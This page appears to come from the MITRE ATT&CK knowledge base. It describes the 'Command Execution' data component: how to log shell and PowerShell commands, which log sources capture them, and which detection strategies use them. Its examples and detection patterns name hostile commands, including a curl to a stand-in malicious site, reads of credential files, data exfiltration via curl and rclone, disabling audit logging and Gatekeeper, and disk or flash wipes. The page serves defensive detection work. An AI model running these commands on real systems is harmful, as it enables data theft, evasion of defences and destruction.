1. Home
  2. Data Components
  3. Command Execution

Command Execution

Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as cmd.exe, bash, zsh, PowerShell, or programmatic execution. Examples:

  • Windows Command Prompt
    • dir – Lists directory contents.
    • net user – Queries or manipulates user accounts.
    • tasklist – Lists running processes.
  • PowerShell
    • Get-Process – Retrieves processes running on a system.
    • Set-ExecutionPolicy – Changes PowerShell script execution policies.
    • Invoke-WebRequest – Downloads remote resources.
  • Linux Shell
    • ls – Lists files in a directory.
    • cat /etc/passwd – Reads the user accounts file.
    • curl http://malicious-site.com – Retrieves content from a malicious URL.
  • Container Environments
    • docker exec – Executes a command inside a running container.
    • kubectl exec – Runs commands in Kubernetes pods.
  • macOS Terminal
    • open – Opens files or URLs.
    • dscl . -list /Users – Lists all users on the system.
    • osascript -e – Executes AppleScript commands.

This data component can be collected through the following measures:

Enable Command Logging

  • Windows:
    • Enable PowerShell logging: Set-ExecutionPolicy Bypass, Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1
    • Enable Windows Event Logging:
      • Event ID 4688: Tracks process creation, including command-line arguments.
      • Event ID 4104: Logs PowerShell script block execution.
  • Linux/macOS:
    • Enable shell history logging in .bashrc or .zshrc: export HISTTIMEFORMAT="%d/%m/%y %T ", export PROMPT_COMMAND='history -a; history -w'
    • Use audit frameworks (e.g., auditd) to log command executions. Example rule to log all execve syscalls: -a always,exit -F arch=b64 -S execve -k cmd_exec
  • Containers:
    • Use runtime-specific tools like Docker’s --log-driver or Kubernetes Audit Logs to capture exec commands.

Integrate with Centralized Logging

  • Collect logs using a SIEM (e.g., Splunk) or cloud-based log aggregation tools like AWS CloudWatch or Azure Monitor. Example Splunk Search for Windows Event 4688:
    index=windows EventID=4688 CommandLine=*

Use Endpoint Detection and Response (EDR) Tools

  • Monitor command executions via EDR solutions

Deploy Sysmon for Advanced Logging (Windows)

  • Use Sysmon's Event ID 1 to log process creation with command-line arguments
ID: DC0064
Domains: ICS, Mobile, Enterprise
Version: 2.0
Created: 20 October 2021
Last Modified: 21 October 2025

Log Sources

Name Channel
auditd:CONFIG_CHANGE udev rule reload or trigger command executed
auditd:EXECVE Use of mv or cp to rename files with '.' prefix
auditd:EXECVE execve: Execution of update-ca-certificates or trust anchor modification commands
auditd:EXECVE gcore, gdb, strings, hexdump execution
auditd:EXECVE Execution of auditctl, systemctl stop auditd, or kill -9 auditd
auditd:EXECVE execution of systemctl with subcommands start, stop, enable, disable
auditd:EXECVE Execution of GUI-related binaries with suppressed window/display flags
auditd:EXECVE curl -X POST, wget --post-data
auditd:EXECVE command line arguments containing lsblk, fdisk, parted
auditd:EXECVE exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions
auditd:EXECVE curl -d, wget --post-data
auditd:EXECVE grep/cat/awk on files with password fields
auditd:EXECVE git push, curl -X POST
auditd:EXECVE Execution of gsettings set org.gnome.login-screen disable-user-list true
auditd:EXECVE execution of setfattr or getfattr commands
auditd:EXECVE Process execution of update-ca-certificates or openssl with suspicious arguments
auditd:EXECVE Execution of chattr to set +i or +a attributes
auditd:EXECVE curl or wget with POST/PUT options
auditd:EXECVE curl -T, rclone copy
auditd:PROCTITLE proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters
auditd:PROCTITLE proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)
auditd:PROCTITLE process title records containing discovery command sequences and environmental assessment patterns
auditd:PROCTITLE command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)
auditd:SYSCALL execution of realmd, samba-tool, or ldapmodify with user-related arguments
auditd:SYSCALL Execution of script interpreters by systemd timer (ExecStart)
auditd:SYSCALL execve: Commands like systemctl stop , service stop, or kill -9
auditd:SYSCALL execve calls to locale, timedatectl, or cat /etc/timezone
auditd:SYSCALL sleep function usage or loops (nanosleep, usleep) in scripts
auditd:SYSCALL connect, execve, write
auditd:SYSCALL execve call including 'nohup' or trailing '&'
auditd:SYSCALL None
auditd:SYSCALL execve: Commands executed within an SSH session where no matching logon/authentication event exists
auditd:SYSCALL chmod, execve
auditd:SYSCALL execve: iptables, nft, firewall-cmd modifications
auditd:SYSCALL execve: Invocation of scp, rsync, curl, or sftp
auditd:SYSCALL execve calls modifying local mail filter configuration files
auditd:SYSCALL execve: process_name IN ("virsh", "VBoxManage", "qemu-img") AND command IN ("list", "info")
auditd:SYSCALL execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog
auditd:SYSCALL execve: openssl pkcs12, certutil, keytool
auditd:SYSCALL execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args
auditd:SYSCALL execution of systemctl or service with enable/start parameters
auditd:SYSCALL execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)
auditd:SYSCALL execve: Execution of python, perl, or custom binaries invoking compression libraries
auditd:SYSCALL execve, USER_CMD
auditd:SYSCALL bash/zsh of base64, tar, gzip, or openssl immediately after file write
auditd:SYSCALL execve: Processes executing sendmail/postfix with forged headers
auditd:SYSCALL execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments
auditd:SYSCALL promiscuous mode transitions (ioctl or ifconfig)
auditd:SYSCALL chattr, rm, shred, dd run on recovery directories or partitions
auditd:SYSCALL execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution
auditd:SYSCALL execve: Execution of downgraded interpreters such as python2 or forced fallback commands
auditd:SYSCALL Command line arguments including SPApplicationsDataType
auditd:SYSCALL Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports
auditd:SYSCALL execution of tools like cat, grep, or awk on credential files
auditd:SYSCALL execve of curl, rsync, wget with internal knowledge base or IPs
auditd:SYSCALL execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate
auditd:SYSCALL Execution of xev, xdotool, or input activity emulators
auditd:SYSCALL execve: Execution of interpreters creating archive-like outputs without calling tar/gzip
auditd:SYSCALL Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes
auditd:SYSCALL execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis
auditd:SYSCALL execve: Execution of curl, wget, or custom scripts accessing financial endpoints
auditd:SYSCALL execve: Execution of tar, gzip, bzip2, or openssl with output redirection
auditd:SYSCALL execve=/sbin/shutdown or /sbin/reboot
auditd:SYSCALL execve calls modifying HISTFILE or HISTCONTROL via unset/export
auditd:SYSCALL execve calls to /usr/bin/locale or shell execution of $LANG
auditd:SYSCALL execution of systemctl or service with enable/start/modify
auditd:SYSCALL execve: Execution of lsmod, modinfo, or cat /proc/modules
auditd:USER_CMD USER_CMD
AWS:CloudTrail InvokeFunction
AWS:CloudTrail eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand
AWS:CloudTrail SSM RunCommand
AWS:CloudTrail GetLogEvents: High frequency log exports from CloudWatch or equivalent services
AWS:CloudTrail command-line execution invoking credential enumeration
AWS:CloudTrail ssm:GetCommandInvocation
AWS:CloudTrail SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances
azure:activity Intune PowerShell Scripts
azure:signinLogs OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain
Command None
docker:api docker logs access or container inspect commands from non-administrative users
docker:daemon docker exec or docker run with unexpected command/entrypoint
docker:events container exec rm|container stop --force
ebpf:syscalls useradd or /etc/passwd modified inside container
EDR:AMSI None
EDR:cli Command Line Telemetry
esxi:hostd command execution
esxi:hostd /var/log/hostd.log
esxi:hostd modification of config files or shell command execution
esxi:hostd shell access or job registration
esxi:hostd logline inspection
esxi:hostd esxcli network firewall set commands
esxi:hostd event stream
esxi:hostd scp/ssh used to move file across hosts
esxi:hostd None
esxi:hostd esxcli system syslog config set or reload
esxi:hostd command log
esxi:hostd Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'
esxi:hostd Command Execution
esxi:hostd remote CLI + vim-cmd logging
esxi:hostd execution + payload hints
esxi:shell snapshot create/copy, esxcli
esxi:shell interactive shell
esxi:shell /var/log/shell.log
esxi:shell invoked remote scripts (esxcli)
esxi:shell base64 or gzip use within shell session
esxi:shell scripts or binaries with misleading names
esxi:shell /var/log/shell.log entries containing "esxcli system clock get"
esxi:shell None
esxi:shell command IN ("esxcli vm process list", "vim-cmd vmsvc/getallvms")
esxi:shell openssl|tar|dd
esxi:shell Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log
esxi:shell CLI usage logs
esxi:shell Command execution trace
esxi:shell shell command execution for chmod, chown, or file permission modification on VMFS or system files
esxi:shell esxcli system syslog config set --loghost='' or stopping hostd service
esxi:shell Shell Access/Command Execution
esxi:shell esxcli software vib list
esxi:shell /root/.ash_history
esxi:shell mv, rename, or chmod commands moving VM files into hidden directories
esxi:shell `esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`
esxi:shell CLI session activity
esxi:shell esxcli system shutdown or reboot invoked
esxi:shell shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration
esxi:shell unset HISTFILE or HISTFILESIZE modifications
esxi:syslog boot logs
esxi:vmkernel /var/log/vmkernel.log
esxi:vmkernel DCUI shell start, BusyBox activity
esxi:vmkernel esxcli system account add
esxi:vmkernel Unexpected restarts of management agents or shell access
esxi:vmkernel esxcli, vim-cmd invocation
esxi:vobd shell session start
esxi:vpxd vCenter Management
fs:fsusage file system activity monitor
fs:fsusage access to BPF devices or interface IOCTLs
gcp:audit None
gcp:audit methodName: setIamPolicy, startInstance, createServiceAccount
kubernetes:audit Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)
kubernetes:audit process execution involving curl, grep, or awk on secrets
linus:syslog None
linux:cli command logging
linux:cli Shell history logs
linux:cli Terminal Command History
linux:cli /home/*/.bash_history
linux:osquery Command-line includes base64 -d or openssl enc -d
linux:osquery process_events.command_line
linux:shell Manual invocation of software enumeration commands via interactive shell
linux:syslog /var/log/syslog or journalctl
linux:syslog Suspicious script or command execution targeting browser folders
linux:syslog Unusual outbound transfers from CLI tools like base64, gzip, or netcat
linux:syslog sudo chage|grep pam_pwquality|cat /etc/login.defs
linux:syslog sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user
linux:syslog sshd logs
linux:syslog CLI access to 'show running-config', 'show password', or 'cat config.txt'
linux:syslog Sudo or root escalation followed by filesystem mount commands
linuxsyslog nslcd or winbind logs
m365:defender Activity Log: Command Invocation
m365:exchange Cmdlet: Get-GlobalAddressList, Get-Recipient
m365:exchange Get-RoleGroup, Get-DistributionGroup
m365:messagetrace Inbound email triggers execution of mailbox-stored custom form
m365:messagetrace Inbound email matches crafted rule trigger pattern tied to persistence logic
m365:messagetrace Inbound email triggering Outlook to auto-access folder tied to malicious Home Page
m365:office Startup execution includes non-default component
m365:office Execution of unsigned macro from template
m365:unified Automated forwarding or file sync initiated by a logic app
m365:unified Search-Mailbox, Get-MessageTrace, eDiscovery requests
m365:unified Set-Mailbox, New-InboxRule
m365:unified Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation
macos:osquery Interpreter exec with suspicious arguments as above
macos:osquery launchd + process_events
macos:syslog system.log
macos:syslog /var/log/system.log
macos:unifiedlog dsconfigad or dscl with create or append options for AD-bound users
macos:unifiedlog launchctl unload, kill, or pkill commands affecting daemons or background services
macos:unifiedlog execution of security-agent detection or enumeration commands
macos:unifiedlog log stream --predicate
macos:unifiedlog Execution of chflags hidden or SetFile -a V
macos:unifiedlog log stream
macos:unifiedlog defaults read -g AppleLocale, systemsetup -gettimezone
macos:unifiedlog profiles install -type=configuration
macos:unifiedlog log stream --predicate 'eventMessage contains "loginwindow" or "pfctl"'
macos:unifiedlog exec or sudo usage with NOPASSWD context or echo modifying sudoers
macos:unifiedlog Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain
macos:unifiedlog nohup, disown, or osascript execution patterns
macos:unifiedlog Execution of 'profiles install -type=configuration'
macos:unifiedlog subsystem:com.apple.Terminal
macos:unifiedlog base64 or curl processes chained within short execution window
macos:unifiedlog exec: Invocation of /usr/bin/defaults write or /usr/bin/plutil modifying plist keys
macos:unifiedlog chmod command with arguments including '+s', 'u+s', or numeric values 4000–6777
macos:unifiedlog command includes dscl . delete or sysadminctl --deleteUser
macos:unifiedlog DS daemon log entries
macos:unifiedlog diskutil eraseDisk / asr restore with destructive flags
macos:unifiedlog pfctl -d, socketfilterfw --setglobalstate off, or modifications to com.apple.alf
macos:unifiedlog pwpolicy|PasswordPolicy
macos:unifiedlog Command line contains smbutil view //, mount_smbfs //
macos:unifiedlog log messages related to disk enumeration context or Terminal session
macos:unifiedlog defaults write com.apple.system.logging or logd manipulation
macos:unifiedlog process calling security find-certificate, export, or import
macos:unifiedlog Execution of log show, fs_usage, or cat targeting system.log
macos:unifiedlog execution of launchctl load/unload/start commands
macos:unifiedlog base64 -d or osascript invoked on staged file
macos:unifiedlog diskutil partitionDisk or eraseVolume with partition scheme modifications
macos:unifiedlog grep/cat on files matching credential patterns
macos:unifiedlog diskutil eraseDisk/zeroDisk or asr restore with destructive flags
macos:unifiedlog spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper
macos:unifiedlog process: at, job runner
macos:unifiedlog Execution of dscl . create with IsHidden=1
macos:unifiedlog log stream --predicate 'processImagePath contains "zip" OR "base64"'
macos:unifiedlog xattr utility execution with -w or -p flags
macos:unifiedlog execution of 'security', 'cat', or 'grep' commands accessing credential storage
macos:unifiedlog launchctl load or boot-time plist registration
macos:unifiedlog dscl -create
macos:unifiedlog kextload execution from Terminal or suspicious paths
macos:unifiedlog xattr -d com.apple.quarantine or similar removal commands
macos:unifiedlog Security framework operations including keychain access, cryptographic operations, and certificate validation
macos:unifiedlog None
macos:unifiedlog Execution of chflags hidden or setfile -a V
macos:unifiedlog process:spawn, process:exec
macos:unifiedlog csrutil disable
macos:unifiedlog log show --predicate 'process == '
macos:unifiedlog Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context
macos:unifiedlog command execution triggered by emond (e.g., shell, curl, python)
macos:unifiedlog Set or unset HIST* variables in shell environment
macos:unifiedlog defaults read -g AppleLocale or systemsetup -gettimezone
macos:unifiedlog launchctl load/unload or plist file modification
macos:unifiedlog dscl . -create
macos:unifiedlog Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks
networkdevice:cli CLI command
networkdevice:cli Policy Update
networkdevice:cli ip ssh pubkey-chain
networkdevice:cli erase flash:, erase startup-config, format disk
networkdevice:cli CLI command logs
networkdevice:cli cmd: cmd=show clock detail
networkdevice:cli Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')
networkdevice:cli None
networkdevice:cli Execution of commands like 'show running-config', 'copy running-config', or 'export config'
networkdevice:cli Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')
networkdevice:cli format flash:, format disk, reformat commands
networkdevice:cli erase flash:, erase nvram:, format disk
networkdevice:cli command logs
networkdevice:cli command logging
networkdevice:cli Interface commands
networkdevice:cli Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'
networkdevice:cli Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')
networkdevice:cli shell command
networkdevice:cli Commands like 'no logging' or equivalents that disable session history
networkdevice:cli Execution of commands such as 'copy tftp flash', 'boot system ', 'reload'
networkdevice:config PKI export or certificate manipulation commands
networkdevice:config Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers
networkdevice:Firewall Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config
networkdevice:syslog Command Audit / Configuration Change
networkdevice:syslog eventlog
networkdevice:syslog command_exec
networkdevice:syslog command-exec: CLI commands containing "show clock", "show clock detail", "show timezone" executed by suspicious user/source
networkdevice:syslog cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'
networkdevice:syslog CLI command audit
networkdevice:syslog system boot logs
networkdevice:syslog exec command='monitor capture'
networkdevice:syslog no logging buffered, no aaa new-model, disable firewall
networkdevice:syslog interactive shell logging
networkdevice:syslog command sequence: erase → format → reload
networkdevice:syslog CLI Command Logging
networkdevice:syslog CLI Command Audit
networkdevice:syslog command audit
networkdevice:syslog Privilege-level command execution
networkdevice:syslog Detected CLI command to export key material
networkdevice:syslog reload command issued
networkdevice:syslog syslog facility LOCAL7 or trap messages
saas:PRMetadata Commit message or branch name contains encoded strings or payload indicators
vpxd.log VM inventory queries and configuration enumeration through vCenter API calls
WinEventLog:Microsoft-Office-Alerts Unexpected DLL or component loaded at Office startup
WinEventLog:Microsoft-Office-Alerts Office application warning or alert on macro execution from template
WinEventLog:Microsoft-Office/OutlookAddinMonitor Outlook loading add-in via unexpected load path or non-default profile context
WinEventLog:PowerShell Get-ADTrust|GetAllTrustRelationships
WinEventLog:PowerShell EventCode=4104
WinEventLog:PowerShell Execution of Microsoft script to enumerate custom forms in Outlook mailbox
WinEventLog:Powershell EventCode=4104
WinEventLog:PowerShell CommandLine=copy-item or robocopy from UNC path
WinEventLog:PowerShell PowerShell launched from outlook.exe or triggered without user invocation
WinEventLog:PowerShell EventCode=4103,4104
WinEventLog:PowerShell EventCode=4103
WinEventLog:PowerShell Execution of PowerShell script to enumerate or remove malicious Home Page folder config
WinEventLog:PowerShell Exchange Cmdlets
WinEventLog:PowerShell CmdletName: Get-Recipient, Get-User
WinEventLog:PowerShell Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets
WinEventLog:PowerShell EventCode=4103,4104,4105, 4106
WinEventLog:PowerShell Execution of PowerShell without -NoProfile flag
WinEventLog:PowerShell EventCode=4101
WinEventLog:PowerShell EventCode=4105
WinEventLog:PowerShell EventCode=4106
WinEventLog:PowerShell EventCode=4103, 4104
WinEventLog:Security EventCode=4104

Detection Strategy

ID Name Technique Detected
DET0413 Abuse of Information Repositories for Data Collection T1213
DET0455 Abuse of PowerShell for Arbitrary Execution T1059.001
DET0120 Account Access Removal via Multi-Platform Audit Correlation T1531
DET0182 Behavior-chain detection for T1135 Network Share Discovery across Windows, Linux, and macOS T1135
DET0151 Behavior-chain, platform-aware detection strategy for T1124 System Time Discovery T1124
DET0197 Behavior-chain, platform-aware detection strategy for T1125 Video Capture T1125
DET0329 Behavioral Detection for T1490 - Inhibit System Recovery T1490
DET0142 Behavioral Detection of CLI Abuse on Network Devices T1059.008
DET0251 Behavioral Detection of Cloud Group Enumeration via API and CLI Access T1069.003
DET0516 Behavioral Detection of Command and Scripting Interpreter Abuse T1059
DET0165 Behavioral Detection of Command History Clearing T1070.003
DET0360 Behavioral Detection of Domain Group Discovery T1069.002
DET0010 Behavioral Detection of Event Triggered Execution Across Platforms T1546
DET0357 Behavioral Detection of Internet Connection Discovery T1016.001
DET0266 Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics T1070.008
DET0078 Behavioral Detection of Malicious Cloud API Scripting T1059.009
DET0140 Behavioral Detection of Malicious File Deletion T1070.004
DET0127 Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy T1036
DET0049 Behavioral Detection of Network History and Configuration Tampering T1070.007
DET0103 Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects T1070.005
DET0378 Behavioral Detection of Obfuscated Files or Information T1027
DET0179 Behavioral Detection of Permission Groups Discovery T1069
DET0008 Behavioral Detection of Remote Cloud Logins via Valid Accounts T1021.007
DET0596 Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution T1021.004
DET0521 Behavioral Detection of Spoofed GUI Credential Prompts T1056.002
DET0195 Behavioral Detection of System Network Configuration Discovery T1016
DET0384 Behavioral Detection of Unix Shell Execution T1059.004
DET0093 Behavioral Detection of User Discovery via Local and Remote Enumeration T1033
DET0076 Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript) T1059.005
DET0464 Behavioral Detection of Wi-Fi Discovery Activity T1016.002
DET0052 Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching T1548.003
DET0131 Behavioral Detection Strategy for Exfiltration Over Alternative Protocol T1048
DET0503 Behavioral Detection Strategy for Exfiltration Over Symmetric Encrypted Non-C2 Protocol T1048.001
DET0269 Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity T1021
DET0386 Cloud Account Enumeration via API, CLI, and Scripting Interfaces T1087.004
DET0083 Container CLI and API Abuse via Docker/Kubernetes (T1059.013) T1059.013
DET0591 Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering T1070.006
DET0063 Cross-Platform Behavioral Detection of Python Execution T1059.006
DET0094 Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse T1053
DET0264 Cross-Platform Detection of JavaScript Execution Abuse T1059.007
DET0333 Cross-Platform Detection of Scheduled Task/Job Abuse via `at` Utility T1053.002
DET0198 Detect Abuse of Container APIs for Credential Access T1552.007
DET0535 Detect Abuse of vSphere Installation Bundles (VIBs) for Persistent Access T1505.006
DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence T1197
DET0412 Detect Access or Search for Unsecured Credentials Across Platforms T1552
DET0307 Detect Access to Unsecured Credential Files Across Platforms T1552.001
DET0275 Detect Adversary Deobfuscation or Decoding of Files and Payloads T1140
DET0526 Detect Archiving and Encryption of Collected Data (T1560) T1560
DET0438 Detect Archiving via Custom Method (T1560.003) T1560.003
DET0268 Detect Archiving via Library (T1560.002) T1560.002
DET0298 Detect Archiving via Utility (T1560.001) T1560.001
DET0523 Detect Code Signing Policy Modification (Windows & macOS) T1553.006
DET0060 Detect Ingress Tool Transfers via Behavioral Chain T1105
DET0589 Detect Modification of Authentication Process via Reversible Encryption T1556.005
DET0050 Detect Persistence via Malicious Office Add-ins T1137.006
DET0095 Detect Persistence via Malicious Outlook Rules T1137.005
DET0519 Detect Persistence via Office Template Macro Injection or Registry Hijack T1137.001
DET0315 Detect Persistence via Office Test Registry DLL Injection T1137.002
DET0029 Detect Persistence via Outlook Custom Forms Triggered by Malicious Email T1137.003
DET0177 Detect Persistence via Outlook Home Page Exploitation T1137.004
DET0048 Detect Remote Email Collection via Abnormal Login and Programmatic Access T1114.002
DET0452 Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation T1553
DET0549 Detect Suspicious Access to Private Key Files and Export Attempts Across Platforms T1552.004
DET0057 Detect Suspicious Access to securityd Memory for Credential Extraction T1555.002
DET0420 Detect User Activity Based Sandbox Evasion via Input & Artifact Probing T1497.002
DET0361 Detecting .NET COM Registration Abuse via Regsvcs/Regasm T1218.009
DET0433 Detecting Code Injection via mavinject.exe (App-V Injector) T1218.013
DET0350 Detecting Downgrade Attacks T1562.010
DET0044 Detecting Malicious Browser Extensions Across Platforms T1176.001
DET0222 Detecting MMC (.msc) Proxy Execution and Malicious COM Activation T1218.014
DET0440 Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse T1216.002
DET0528 Detecting Remote Script Proxy Execution via PubPrn.vbs T1216.001
DET0034 Detection of Adversarial Process Discovery Behavior T1057
DET0223 Detection of Adversary Abuse of Software Deployment Tools T1072
DET0097 Detection of Application Window Enumeration via API or Scripting T1010
DET0734 Detection of Automated Collection T0802
DET0554 Detection of Bluetooth-Based Data Exfiltration T1011.001
DET0444 Detection of Command and Control Over Application Layer Protocols T1071
DET0655 Detection of Command and Scripting Interpreter T1623
DET0760 Detection of Command-Line Interface T0807
DET0671 Detection of Data Destruction T1662
DET0758 Detection of Data Destruction T0809
DET0146 Detection of Data Destruction Across Platforms via Mass Overwrite and Deletion Patterns T1485
DET0123 Detection of Data Exfiltration via Removable Media T1052
DET0749 Detection of Data from Local System T0893
DET0014 Detection of Data Staging Prior to Exfiltration T1074
DET0426 Detection of Direct Volume Access for File System Evasion T1006
DET0145 Detection of Disabled or Modified System Firewalls across OS Platforms. T1562.004
DET0007 Detection of Domain Trust Discovery via API, Script, and CLI Enumeration T1482
DET0077 Detection of Exfiltration Over Alternate Network Interfaces T1011
DET0512 Detection of Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002
DET0149 Detection of Exfiltration Over Unencrypted Non-C2 Protocol T1048.003
DET0416 Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP) T1071.002
DET0772 Detection of Graphical User Interface T0823
DET0750 Detection of Indicator Removal on Host T0872
DET0745 Detection of Lateral Tool Transfer T0867
DET0434 Detection of Launch Agent Creation or Modification on macOS T1543.001
DET0013 Detection of Local Browser Artifact Access for Reconnaissance T1217
DET0380 Detection of Local Data Collection Prior to Exfiltration T1005
DET0261 Detection of Local Data Staging Prior to Exfiltration T1074.001
DET0138 Detection of Malicious Code Execution via InstallUtil.exe T1218.004
DET0092 Detection of Malicious or Unauthorized Software Extensions T1176
DET0328 Detection of Malicious Profile Installation via CMSTP.exe T1218.003
DET0439 Detection of Malware Relocation via Suspicious File Movement T1070.010
DET0725 Detection of Masquerading T0849
DET0215 Detection of Multi-Platform File Encryption for Impact T1486
DET0770 Detection of Network Connection Enumeration T0840
DET0800 Detection of Network Sniffing T0842
DET0040 Detection of Persistence Artifact Removal Across Host Platforms T1070.009
DET0445 Detection of Proxy Infrastructure Setup and Traffic Bridging T1090
DET0209 Detection of Registry Query for Environmental Discovery T1012
DET0071 Detection of Remote Data Staging Prior to Exfiltration T1074.002
DET0079 Detection of Remote Service Session Hijacking T1563
DET0804 Detection of Remote Services T0886
DET0751 Detection of Screen Capture T0852
DET0466 Detection of Script-Based Proxy Execution via Signed Microsoft Utilities T1216
DET0735 Detection of Scripting T0853
DET0897 Detection of Selective Exclusion T1679
DET0765 Detection of Service Stop T0881
DET0793 Detection of System Binary Proxy Execution T0894
DET0320 Detection of System Network Connections Discovery Across Platforms T1049
DET0571 Detection of System Process Creation or Modification Across Platforms T1543
DET0483 Detection of System Service Discovery Commands Across OS Platforms T1007
DET0253 Detection of Systemd Service Creation or Modification on Linux T1543.002
DET0458 Detection of Trust Relationship Modifications in Domain or Tenant Policies T1484.002
DET0607 Detection of Unix Shell T1623.001
DET0791 Detection of User Execution T0863
DET0027 Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets T1071.001
DET0237 Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts T1037.004
DET0545 Detection Strategy for Cloud Administration Command T1651
DET0505 Detection Strategy for Command Obfuscation T1027.010
DET0065 Detection Strategy for Container Administration Command Abuse T1609
DET0349 Detection Strategy for Content Injection T1659
DET0108 Detection Strategy for Data Encoding in C2 Channels T1132
DET0579 Detection Strategy for Device Driver Discovery T1652
DET0062 Detection Strategy for Disable or Modify Linux Audit System T1562.012
DET0316 Detection Strategy for Disk Content Wipe via Direct Access and Overwrite T1561.001
DET0297 Detection Strategy for Disk Structure Wipe via Boot/Partition Overwrite T1561.002
DET0137 Detection Strategy for Disk Wipe via Direct Disk Access and Destructive Commands T1561
DET0569 Detection Strategy for Downgrade System Image on Network Devices T1601.002
DET0192 Detection Strategy for Email Hiding Rules T1564.008
DET0558 Detection Strategy for ESXi Hypervisor CLI Abuse T1059.012
DET0555 Detection Strategy for Event Triggered Execution via emond on macOS T1546.014
DET0015 Detection Strategy for Exclusive Control T1668
DET0548 Detection Strategy for Exfiltration Over Web Service T1567
DET0153 Detection Strategy for Exfiltration Over Webhook T1567.004
DET0570 Detection Strategy for Exfiltration to Cloud Storage T1567.002
DET0318 Detection Strategy for Exfiltration to Code Repository T1567.001
DET0284 Detection Strategy for Exfiltration to Text Storage Sites T1567.003
DET0406 Detection Strategy for Extended Attributes Abuse T1564.014
DET0495 Detection Strategy for Financial Theft T1657
DET0055 Detection strategy for Group Policy Discovery on Windows T1615
DET0502 Detection Strategy for Hidden Artifacts Across Platforms T1564
DET0461 Detection Strategy for Hidden File System Abuse T1564.005
DET0032 Detection Strategy for Hidden Files and Directories T1564.001
DET0353 Detection Strategy for Hidden User Accounts T1564.002
DET0321 Detection Strategy for Hidden Virtual Instance Execution T1564.006
DET0128 Detection Strategy for Hidden Windows T1564.003
DET0067 Detection Strategy for Ignore Process Interrupts T1564.011
DET0317 Detection Strategy for Impair Defenses Across Platforms T1562
DET0239 Detection Strategy for Impair Defenses Indicator Blocking T1562.006
DET0563 Detection Strategy for Impair Defenses via Impair Command History Logging across OS platforms. T1562.003
DET0286 Detection Strategy for Impersonation T1656
DET0568 Detection Strategy for Input Injection T1674
DET0450 Detection Strategy for Kernel Modules and Extensions Autostart Execution T1547.006
DET0183 Detection Strategy for Lateral Tool Transfer across OS platforms T1570
DET0255 Detection Strategy for Log Enumeration T1654
DET0101 Detection Strategy for Lua Scripting Abuse T1059.011
DET0170 Detection Strategy for Modify System Image on Network Devices T1601
DET0233 Detection Strategy for Network Device Configuration Dump via Config Repositories T1602.002
DET0314 Detection Strategy for Network Sniffing Across Platforms T1040
DET0469 Detection Strategy for Patch System Image on Network Devices T1601.001
DET0109 Detection Strategy for Plist File Modification (T1647) T1647
DET0533 Detection Strategy for Poisoned Pipeline Execution via SaaS CI/CD Workflows T1677
DET0417 Detection Strategy for Power Settings Abuse T1653
DET0451 Detection Strategy for PowerShell Profile Persistence via profile.ps1 Modification T1546.013
DET0408 Detection Strategy for Reflection Amplification DoS (T1498.002) T1498.002
DET0574 Detection Strategy for Remote System Enumeration Behavior T1018
DET0584 Detection Strategy for Resource Forking on macOS T1564.009
DET0126 Detection Strategy for SSH Key Injection in Authorized Keys T1098.004
DET0240 Detection Strategy for Steal or Forge Authentication Certificates T1649
DET0056 Detection Strategy for Subvert Trust Controls via Install Root Certificate. T1553.004
